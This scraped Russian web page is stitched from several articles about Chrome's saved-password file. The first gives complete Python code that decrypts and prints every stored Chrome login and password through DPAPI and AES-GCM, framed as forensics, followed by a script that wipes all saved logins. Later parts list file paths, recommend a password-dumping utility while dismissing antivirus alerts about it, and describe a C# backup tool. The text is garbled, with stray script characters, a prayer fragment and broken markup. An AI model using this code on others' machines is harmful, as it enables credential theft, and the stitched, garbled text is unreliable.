Google Chrome login data чем открыть

Поскольку Chrome сохраняет пароли для подключения к различным web-ресурсам локально, в базе данных sqlite એ , возможность извлечения сохраненных паролей в самом популярном браузере — полезная и, порой, решающая задача для успеха криминалистического исследования. Однако, делать это вручную довольно муторно.

Кроме того, Chrome сохраняет большую часть данных о всех просмотрах локально, на вашем диске. Здесь показан реально используемый код Python для извлечения сохраненных паролей в Chrome с Windows, который не однократно использовался при проведении судебной экспертизы, связанной с киберпреступлениями по запросам арбитражного суда. А таких преступлений становится всё больше и больше. Кроме того, показан небольшой скрипт для защиты от подобных атак.

Для начала установим необходимую библиотеки:

pip3 install pycryptodome pypiwin32

Откроем новый файл Python и импортируем необходимые модули:

import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil from datetime import timezone, datetime, timedelta

Прежде чем перейти непосредственно к извлечению паролей Chrome, нужно определить несколько полезных функций, которые помогут в основном скрипте:

Top 2 Ways to Backup Chrome Bookmarks and Passwords


def get_chrome_datetime(chromedate): «»»Вернуть объект datetime.datetime из формата datetime в chrome Поскольку `chromedate` форматируется как количество микросекунд с января 1601 г.»»» return datetime(1601, 1, 1) + timedelta(microseconds=chromedate) def get_encryption_key(): local_state_path = os.path.join(os.environ[«USERPROFILE»], «AppData», «Local», «Google», «Chrome», «User Data», «Local State») with open(local_state_path, «r», encoding=»utf-8″) as f: local_state = f.read() local_state = json.loads(local_state) # декодировать ключ шифрования из Base64 key = base64.b64decode(local_state[«os_crypt»][«encrypted_key»]) # удалить DPAPI str key = key[5:] # вернуть расшифрованный ключ, который был изначально зашифрован # использование сеансового ключа, полученного из учетных данных текущего пользователя # документ: http://timgolden.me.uk/pywin32-docs/win32crypt.html return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] def decrypt_password(password, key): try: # получить вектор инициализации iv = password[3:15] password = password[15:] # генерировать шифр cipher = AES.new(key, AES.MODE_GCM, iv) # расшифровать пароль return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: # не поддерживается return «»

Функция get_chrome_datetime() отвечает за преобразование формата даты chrome в ронятный формат даты и времени.

Функция get_encryption_key() извлекает и декодирует ключ Advanced Encryption Standard એ , который использовался для шифрования паролей, он хранится в пути %USERPROFILE%AppDataLocalGoogleChromeUser DataLocal State как файл JSON.

This App exposed all your Chrome Passwords!

decrypt_password() принимает зашифрованный пароль и ключ AES в качестве аргументов и возвращает расшифрованную версию пароля.

Ниже приведены основные функции:

def main(): # получить ключ AES key = get_encryption_key() # локальный путь к базе данных sqlite Chrome db_path = os.path.join(os.environ[«USERPROFILE»], «AppData», «Local», «Google», «Chrome», «User Data», «default», «Login Data») # копируем файл в другое место # поскольку база данных будет заблокирована, если в данный момент запущен Chrome filename = «ChromeData.db» shutil.copyfile(db_path, filename) # подключение к БД db = sqlite3.connect(filename) cursor = db.cursor() # таблица logins содержит нужные нам данные cursor.execute(«select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created») # перебор всех строк for row in cursor.fetchall(): origin_url = row[0] action_url = row[1] username = row[2] password = decrypt_password(row[3], key) date_created = row[4] date_last_used = row[5] if username or password: print(f»Origin URL: «) print(f»Action URL: «) print(f»Username: «) print(f»Password: «) else: continue if date_created != 86400000000 and date_created: print(f»Creation date: «) if date_last_used != 86400000000 and date_last_used: print(f»Last Used: «) print(» EnlighterJSRAW» data-enlighter-language=»python»> if __name__ == «__main__»: main()

Результат должен быть примерно в таком формате (очевидно, что здесь использованы невалидные учетные данные):

Отлично, теперь вы знаете, что на вашем компьютере есть масса конфиденциальной информации, которую легко прочитать с помощью подобных скриптов.

Отказ от ответственности: Запускайте этот сценарий только на своем компьютере или на компьютере, на использование которого у Вас есть разрешение. Я не несу никакой ответственности за любое неправомерное использование.

Удаление паролей

Надеюсь убедил вас в том, что хранить пароли в Chrome довольно опасно. Теперь, зададимся вопросом, как можно себя защитить от подобных вредоносных скриптов.

Здесь я напишу сценарий для доступа к базе данных и удаления всех записей в таблице logins :

import sqlite3 import os db_path = os.path.join(os.environ[«USERPROFILE»], «AppData», «Local», «Google», «Chrome», «User Data», «default», «Login Data») db = sqlite3.connect(db_path) cursor = db.cursor() # В таблице logins есть нужные нам данные cursor.execute(«select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created») n_logins = len(cursor.fetchall()) print(f»Deleting a total of logins. «) cursor.execute(«delete from logins») cursor.connection.commit()

Для этого вам потребуется закрыть браузер Chrome, а затем запустить его, вот мой результат:

Deleting a total of 204 logins.

Открыв Chrome на этот раз, вы заметите, что автозаполнение в формах входа больше не существует. Запустив первый скрипт, вы заметите, что он ничего не выводит, так что мы успешно защитились от этого!

Заключение

Здесь вы узнали, как написать сценарии Python для извлечения и удаления паролей Chrome в Windows. Теперь злоумышленники не смогут получить к ним доступ.

Обратите внимание, что здесь говорилось только о файле Login Data , который содержит учетные данные для входа. Изучите этот каталог более подробно.

Например, есть файл History , где хранятся все посещенные URL-адреса, а также поисковые запросы по ключевым словам с множеством других метаданных. Также есть Cookies , Media History , Preferences , QuotaManager , Reporting and NEL , Shortcuts , Top Sites и Web Data .

Это все таблицы базы данных Chrome, к которым можно очень просто получить доступ. Прежде чем их изучать сделайте копию после чего открывайте базу данных, чтобы не закрывать Chrome всякий раз, когда захотите получить доступ к информации.

Всё, на сегодня хватит. Посмотрите полный код в репозитарии на Github.

Немного позже я научу вас взламывать файлы PDF в Python.

Требуется регистрация для доступа к контенту. Регистрация, если Вы уже зарегистрированы — подключитесь

Print Friendly, PDF и оста́ви нам до́лги наша, я́коже и мы оставля́ем должнико́м нашим; и не введи́ нас во искушение, но изба́ви нас от лука́ваго</p data-lazy-src=

Как вставить Смайлики в Гугл документах

Источник: usbtor.ru

Чем открыть файл login data

Если вы столкнулись с ситуацией в которой необходимо узнать, где в Google Chrome хранятся пароли, то я предлагаю вам прочитать эту статью. В ней я постараюсь подробно, но понятным языком рассказать не только о методах хранения, но и о методах шифрования паролей в браузере Google Chrome. Кстати о том же, но только в браузере Мозила, мы писали в статье «Где хранит пароли Firefox».

Где Chrome хранит пароли?

Ниже я покажу все возможные расположения папок и файла паролей Гугл Хром в разных операционных системах.

Пароли Хром хранятся в папке:

Windows XP
C:Documents And SettingsSpysoftnetLocal SettingsApplication DataGoogleChrome(если имеется папка User Data, то User DataDefault

Windows Vista
C:UsersSpysoftnetAppDataLocalGoogleChromeUser DataDefault

Windows 7
C:UsersSpysoftnetAppDataLocalGoogleChromeUser DataDefault

Windows 8
C:UsersSpysoftnetAppDataLocalGoogleChromeUser DataDefault

Windows 10

Mac OS X

Linux

Chrome OS
/home/chronos/

Пароли Хром хранятся в файле:
Login Data

Данный файл представляет собой базу данных SQLite. Открыв этот файл вы можете увидеть несколько колонок:

  • Origin_url — адрес сайта
  • Username_value — логин
  • Password_value — пароль
  • и т.д.

где хром сохраняет пароли

Все данные этого файла хранятся в открытом виде. Все, кроме данных колонки пароля «Password_value». Chrome шифрует пароли используя алгоритм шифрования AES с длиной шифрования 256 бит.

Чем открыть файл Login Data?

Файл «Login Data» можно открыть с помощью утилиты DB Browser for SQLite.

Login data

Скачать DB Browser for SQLite бесплатно вы можете по этой ссылке.

Как вытащить пароли Google Chrome?

Если это ваши пароли, в вашей операционной системе, вы можете посмотреть сохраненные пароли с помощью собственного менеджера паролей Гугл Хром. Как это сделать мы писали в этой статье.

Существует и другой способ вытащить пароли из Хрома — это использование программы ChromePass от разработчика Nirsoft. Кроме того есть еще минимум несколько подобных программ, для того чтобы найти их, используйте поиск на сайте по слову «Chrome».

ChromePass

Включенный антивирус может срабатывать на данную утилиту. Но вас это не должно пугать, это на 100% ложное срабатывание.

Хочу предупредить. Если вы скопируете файл «Login Data» с другого компьютера и попробуете открыть пароли на своем компьютере с помощью менеджера паролей браузера, вас ждет разочарование. Поля, где должны быть пароли, будут пустыми или будет выводится сообщение, что возможно это не ваш профиль.

Но, есть и хорошая новость. Данные пароли скрыты от пользователя, но вводятся на сайтах, на которые вы пытаетесь зайти. Теперь остается самое малое — это посмотреть пароль под звездочками. Как это сделать вы можете найти в статье «Как открыть пароль под звездочками»

Как защитить пароли Google Chrome?

Теперь пару слов о защите. Единственное и самое важное правило, которое вы должны знать, это не позволять вашему браузеру запоминать введенные логины и пароли. Вместо этого использовать менеджеры паролей. А еще лучше запоминать пароли с помощью специальных карточек, об этом легком способе запоминания даже трудных паролей мы писали в статье «Как запомнить пароль»

Не так давно у меня возникла идея о создании своей личной программы для бэкапа паролей Google Chrome. Да, в интернете очень много подобных программ, но результат паранойи (что пароли сливаются на чей то сервер «про запас»), да и желание узнать, чем дышит любимый браузер — перевесили чашу весов.

Рассказывать буду на основе ОС Windows 7.

Начну с того — где хранится файл с паролями. Этот файл — «Login Data» в папке «C:UsersSomeUserAppDataLocalGoogleChromeUser DataDefault».

Это база данных SQLite.

В ней есть 14 колонок. Нас же интересуют только 3: origin_url (ссылка на сам сайт), username_value (логин), password_value(пароль). Среди других колонок есть так же: страница авторизации, название элемента ввода для логина и пароля и другие. Все данные незашифровыванны(видно на скрине), кроме поля password_value.
В поле с паролем находится байтовый массив. Выглядит он следующим образом.

Способ шифрования выбран очень удобный для разработчиков. Они использовали Data Protection Application Programming Interface (отличная статья (как оказалось позже и единственная), которая описывает принципы работы этой системы), который использует Windows.
Подробнее информация в ссылке, тем более эта система шифрования заслуживает отдельной темы. Вкратце скажу, что эта система работает в одном из 2 режимов.

  1. С использованием машинного ключа.
    Ключ уникален для текущей системы. Но он позволяет разным программам работать с зашифрованными данными без передачи ключа друг — другу, но исключая утечку данных за пределы машины, а точнее пользователя.
  2. С использованием ключа пользователя.
    Без комментариев.

Так же стоит отметить, что эту систему безопасности использует всем известный IE версии 7 и старше. Защита в ней устроена ещё на порядок выше, чем у Google Chrome. Там используется вдобавок ещё и энтропия, а в качестве хранилища — используется реестр. Разработчики Microsoft’а приятно удивили.

В конце статьи есть исходный код программы. Основные её моменты мы сейчас разберем.

Итак — начнем!

Нам будет необходимо считать байты поля с паролем, так как хранится пароль именно в байтовом массиве. Для этого я использовал System.Data.SQLite Interop Library версии 1.0.65.0 (есть в архиве).
В проекте использован класс DPAPI, который был найден в интернете. На момент создания проекта не было цели написания статьи, так что автор класса утерян, но снимаю перед ним шляпу — работа проделана серьезная.

Объявим нужные нам объекты и переменные:

Далее мы заполняем DataTable DB базой данных из нашего файла:

Теперь осталось только вытащить нужную информацию из неё и записать в файл. На этом этапе файл уже не используется — работа ведется только с объектом DataTable:

В итоге у нас есть HTML-документ с нашими логинами-паролями, которые можно хранить на своем мобильном телефоне, или распечатать и положить в конверт… При желании можно записывать больше полей, но лично мне хватает выше упомянутых трех.

Если есть вопросы — с удовольствием отвечу. Большое спасибо за внимание!

Нет связанных сообщений

Источник: mnogotolka.ru

Рейтинг
Загрузка ...